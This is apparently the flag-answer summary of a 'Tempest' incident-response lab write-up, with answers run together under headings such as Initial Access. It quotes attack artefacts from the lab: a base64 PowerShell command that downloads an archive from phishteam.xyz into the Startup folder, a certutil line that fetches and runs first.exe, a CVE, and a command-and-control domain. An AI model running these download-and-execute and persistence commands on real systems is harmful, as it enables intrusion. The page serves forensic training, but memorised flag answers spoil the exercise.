Tempest
Flags
FLAG SUMMARY
Preparation
CB3A1E6ACFB246F256FBFEFDB6F494941AA30A5A7C3F5258C3E63CFA27A23DC6665DC3519C2C235188201B5A8594FEA205C3BCBC75193363B87D2837ACA3C91FD0279D5292BC5B25595115032820C978838678F4333B725998CFE9253E186D60Initial Access
free_magicules.docbenimaru-TEMPEST496167.71.199.191JGFwcD1bRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdBcHBsaWNhdGlvbkRhdGEnKTtjZCAiJGFwcFxNaWNyb3NvZnRcV2luZG93c1xTdGFydCBNZW51XFByb2dyYW1zXFN0YXJ0dXAiOyBpd3IgaHR0cDovL3BoaXNodGVhbS54eXovMDJkY2YwNy91cGRhdGUuemlwIC1vdXRmaWxlIHVwZGF0ZS56aXA7IEV4cGFuZC1BcmNoaXZlIC5cdXBkYXRlLnppcCAtRGVzdGluYXRpb25QYXRoIC47IHJtIHVwZGF0ZS56aXA7Cg==2022-30190C:\Users\benimaru\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartupC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hiddennoni certutil -urlcache -split -f 'http://phishteam.xyz/02dcf07/first.exe' C:\Users\Public\Downloads\first.exe; C:\Users\Public\Downloads\first.exeCE278CA242AA2023A4FE04067B0A32FBD3CA1599746C160949868FFC7FC3D7D8resolvecyber.xyz:80Discovery
Privilege Escalation
Actions on Objectives
Last updated